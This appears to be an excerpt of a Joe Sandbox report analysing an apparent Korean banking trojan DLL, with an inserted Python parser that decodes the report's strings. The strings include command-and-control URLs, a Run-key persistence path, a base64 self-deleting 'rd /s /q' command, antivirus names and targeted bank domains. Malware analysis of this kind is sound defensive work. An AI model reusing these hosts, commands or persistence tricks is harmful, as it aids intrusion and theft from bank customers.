• String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
• API String ID: 4077377486-2496724313
• Opcode ID: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
• Instruction ID: 293d0e7632e531392dd0fb5c2f77952c0a17312896667c4884a995f19a9271bc
• Opcode Fuzzy Hash: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
• Instruction Fuzzy Hash: 2C81D6B6C04249BEFB01DBA4DC81EEF7B7DEF09394F244166F505A6186DA316E4087B1
APIs
• ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
  • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
  • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseFormatQueryTimeValue___crt
• String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
• API String ID: 271660946-2089455369
• Opcode ID: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
• Instruction ID: c0ffa68043a95791f02fd04d8c4918fc6d3fd57fe225104bb55dd78593dce371
• Opcode Fuzzy Hash: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
• Instruction Fuzzy Hash: CB31C3B680460DBAEB11CB60DC46FDF77ACEF04351F54406AF644AB182EB35BB448B95
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$urlmon.dll$wininet.dll
                                                                                                                                                                          • API String ID: 2994545307-2475139894
                                                                                                                                                                          • Opcode ID: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction ID: 07a37e4b5f5db9f07829dfdfef9d508389309d866dd02fd17ced75df8caaf776
                                                                                                                                                                          • Opcode Fuzzy Hash: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 72313EB690461CBEEB11DBA4CC45FEF7B7DEB08341F5400A6F608AB181D7759A448EA0
APIs
• Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
• wsprintfA.USER32 ref: 10004ADB
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
• API String ID: 1749205058-4002687564
• Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
• Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
• Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
• Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61
APIs
  • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
  • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
• wsprintfA.USER32 ref: 10006DAB
• ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
  • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
  • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
Strings
• U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D6D
• %s "%s",ClassObject, xrefs: 10006DA5
• REG_SZ, xrefs: 10006D67
• COAPI, xrefs: 10006DC9
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
• String ID: %s "%s",ClassObject$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
• API String ID: 1762869224-2622945652
• Opcode ID: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
• Instruction ID: 1af9319de0d48fb467b647ae3650b89cedd961ef50c791020d1a6b5894edbf87
• Opcode Fuzzy Hash: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
• Instruction Fuzzy Hash: BA11B2B694411CBEFB11D3A4DC86FEA776CDB14380F1004A1F744B9085EAB16FC88AA4
APIs
Strings
• , xrefs: 10005394
• www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000534E
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
• API String ID: 2994545307-230412946
• Opcode ID: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
• Instruction ID: 0a715c4d5cc77e21522ecf04e59044d57c4e71f0c84efc3cca746646dee8662b
• Opcode Fuzzy Hash: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
• Instruction Fuzzy Hash: 8B01D27690431D76EB22EB28CC41FCE7E68EF483C2F0404B5BA496A056D7B1BE805A90
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: 7$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-3701087130
• Opcode ID: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
• Instruction ID: 71c666905a5763b167ab1a21182f42240e287b7e11d47a96cc59b11d17f26c76
• Opcode Fuzzy Hash: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
• Instruction Fuzzy Hash: 4731F571408284AED712EB10DC8669E7FA6EF84385F50886DFAC85B112C770A9A49B53
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep$wsprintf
• String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
• API String ID: 3195947292-1533272838
• Opcode ID: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
• Instruction ID: acd8b216c9490be150f41627fddde4231ced29d76843988cf1697fe551d5a772
• Opcode Fuzzy Hash: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
• Instruction Fuzzy Hash: 0D21A17680021CBAEB11DBE48C85EDFBB7DEF08390F140466F604B6141EA756A858BA1
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: strcspn$FormatTime___crt
• String ID: http://
• API String ID: 4006067733-1121587658
• Opcode ID: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
• Instruction ID: 5e5274a5df46717633dbefa534eebea5f36de8a9ab4d0e8209e5c86ee6f0ed2e
• Opcode Fuzzy Hash: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
• Instruction Fuzzy Hash: 6541457690421CBAEF11DBB4DC85FDE77BCDF08394F5004A6F608E6082DA75AF458AA1
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunkwsprintf
• String ID: %s\%s$.$\*.*
• API String ID: 2324811901-2210278135
• Opcode ID: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
• Instruction ID: 788f7299f4ef3f0d15df8f53932c811205ff60b6d2b73f04fca062f583e9a503
• Opcode Fuzzy Hash: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
• Instruction Fuzzy Hash: 59316FB6C0025CBEEF12DBA4CD46ECEBB79EF04380F1005E6F618A6051DB719B989B50
APIs
  • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B73,00000000,00000000,?,?,00000202,?), ref: 10003EDA
• GetLastError.KERNEL32 ref: 10006ACB
  • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
  • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
• Sleep.KERNEL32(0002BF20), ref: 10006B00
• CreateThread.KERNEL32(00000000,00000000,10006890,00000000,00000000,00000000), ref: 10006B14
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
• String ID: 0x5d65r455f$5762479093
• API String ID: 3244495550-2446933972
• Opcode ID: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
• Instruction ID: 4f67e99d50a46098441a250a8f858ff8eaba0e926cf0b864be99c43c72b3ca27
• Opcode Fuzzy Hash: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
• Instruction Fuzzy Hash: F7014CB69443587AF210E3716CC6DFB3A4CDF953E0F240535FA15950CBDA24AC1581B2
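Worked example, added here and not part of the Joe Sandbox report or of the analysed sample's code: a small parser for the plain-text form of the per-function records above. It splits the dump into records at each "APIs" header, base64-decodes the tokens in "String ID" lines (the `Y21k...` token in the first record above and the `aHR0...` token in the record after it), and flags the evasion pattern of the record just above: `CreateMutexA` followed by `GetLastError`, and `Sleep(0002BF20)`, which is 0x2BF20 = 180000 ms, the three-minute sleep the overview's "Contains long sleeps" signature refers to. The embedded sample text is constructed from the records on this page; the record-splitting rule and the base64 heuristic (at least 16 characters, length a multiple of 4, decodes to printable ASCII) are this example's assumptions, not a Joe Sandbox format specification.

```python
"""Parse Joe Sandbox per-function records: decode base64 String IDs,
flag long sleeps and the CreateMutex -> GetLastError evasion chain.

Added example, not code from the report or from the analysed sample.
The record layout (a record starts at an "APIs" line, String IDs are
'$'-joined) is an assumption drawn from the text of this page.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

STRING_ID_RE = re.compile(r"^String ID:\s*(.*)$")
API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)"
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" long-sleep threshold


@dataclass
class Record:
    apis: list = field(default_factory=list)     # (api, module, args, subcall)
    strings: list = field(default_factory=list)


def try_b64(token: str):
    """Decode token if it is base64 for printable ASCII; otherwise None."""
    if len(token) % 4 or not B64_RE.match(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return None
    if raw and all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None  # e.g. "SeDebugPrivilege" is base64-shaped but decodes to junk


def parse_records(text: str):
    """Split the dump into Records, one per 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = STRING_ID_RE.match(line)
        if m:
            cur.strings.extend(s for s in m.group(1).split("$") if s)
            continue
        m = API_RE.search(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append((m.group("api"), m.group("mod"), args, m.group("sub")))
    return records


def analyse(text: str):
    """Return ({b64_token: decoded_text}, [(record_index, finding), ...])."""
    decoded, findings = {}, []
    for i, rec in enumerate(parse_records(text)):
        for s in rec.strings:
            d = try_b64(s)
            if d is not None:
                decoded[s] = d
        names = [a[0] for a in rec.apis]
        for api, _mod, args, _sub in rec.apis:
            if api == "Sleep" and args and HEX_RE.match(args[0]):
                ms = int(args[0], 16)  # Joe Sandbox prints arguments as hex
                if ms >= LONG_SLEEP_MS:
                    findings.append((i, f"Sleep({ms} ms) >= 3 min"))
        if any(n.startswith("CreateMutex") for n in names) and "GetLastError" in names:
            findings.append((i, "CreateMutex then GetLastError: single-instance/evasion check"))
    return decoded, findings


def urls(decoded: dict):
    """Pull http(s) URLs out of the decoded strings."""
    out = []
    for value in decoded.values():
        out.extend(re.findall(r"https?://[^\s\"'<>]+", value))
    return out


# Constructed sample: the records on this page, reduced to the lines used here.
SAMPLE = r"""
APIs
• String ID: 7$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
APIs
• String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
APIs
  • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B73,00000000,00000000,?,?,00000202,?), ref: 10003EDA
• GetLastError.KERNEL32 ref: 10006ACB
• Sleep.KERNEL32(0002BF20), ref: 10006B00
• CreateThread.KERNEL32(00000000,00000000,10006890,00000000,00000000,00000000), ref: 10006B14
• String ID: 0x5d65r455f$5762479093
"""

if __name__ == "__main__":
    dec, found = analyse(SAMPLE)
    for tok, val in dec.items():
        print(f"{tok[:12]}... -> {val}")
    for idx, msg in found:
        print(f"record {idx}: {msg}")
    print("urls:", urls(dec))
```

Running it decodes the two tokens to `cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"`, the ping-as-delay followed by a recursive directory wipe that the "Uses ping.exe to sleep" signature describes, and `http://107.163.56.110:18530/u1129.html`, a URL on a non-standard port consistent with the overview's network signatures. Treat decoded values as leads to confirm against the report's network and process sections rather than as ground truth on their own, and note that `STRING_ID_RE` is anchored so the "API String ID" hash lines are not mistaken for string tables.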
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID:
• String ID: /$UT
• API String ID: 0-1626504983
• Opcode ID: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
• Instruction ID: d03cd593b305998a047facd2d6d5b23892ca1700a5cf5fa6db110c2fb33c411d
• Opcode Fuzzy Hash: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
• Instruction Fuzzy Hash: B902B075A0478D9BEB21CF64C884F9EBBF9EF04380F1044AEE44997246DB70AA84CB55
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: %s%s$cmd.exe$log.txt
• API String ID: 2994545307-357432712
• Opcode ID: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
• Instruction ID: 42687b898050392b2aa34869ec4325c4612b7f7ca25810209864e9fbe1877dbd
• Opcode Fuzzy Hash: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
• Instruction Fuzzy Hash: A841DAB690435CBEEB11DAA4CC85EDF77ACEF04384F1045A6F708E7091DA34AE848B60
APIs
  • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
• Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
• String ID: %s\lang.ini$http://$search
• API String ID: 1721638100-482061809
• Opcode ID: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
• Instruction ID: 870dc5a9e8937f5dec60cb765e1a8b9b6c263c42da1418f367658ae9c7f1e2c5
• Opcode Fuzzy Hash: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
• Instruction Fuzzy Hash: 491106769081197BFB61DAA4CC42FDB776CDB043D5F0045B2FB44A5091EA72EFC48660
APIs
Strings
Memory Dump Source
